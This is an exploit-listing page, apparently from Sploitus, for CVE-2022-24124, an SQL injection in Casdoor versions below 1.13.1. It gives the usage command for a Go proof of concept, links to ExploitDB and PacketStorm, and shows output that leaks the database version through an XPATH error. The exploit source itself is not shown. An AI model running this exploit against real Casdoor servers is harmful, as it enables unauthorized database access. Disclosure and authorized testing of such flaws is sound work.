Exploit for SQL Injection in Casbin Casdoor CVE-2022-24124

Name: Exploit for SQL Injection in Casbin Casdoor CVE-2022-24124
Rating: 5 (227 reviews)

2022-06-04 | CVSS 5.0

## https://sploitus.com/exploit?id=BE51EA03-8EDF-5956-B032-2D687BDB6465
# POC for CVE-2022-24124

> Exploit Code for [CVE-2022-24124](https://nvd.nist.gov/vuln/detail/CVE-2022-24124) aka Casdoor SQL Injection

Exploit Links: [[ExploitDB-50792](https://www.exploit-db.com/exploits/50792)] [[PacketStormSecurity](https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html)]

Expected outcome: Dump SQL database version on host running Casdoor < 1.13.1

Intended only for educational and testing in corporate environments.

### Exploit Usage

```shell
Barricade➜ go run exploit.go -u http://127.0.0.1:8080

-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)

[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1
```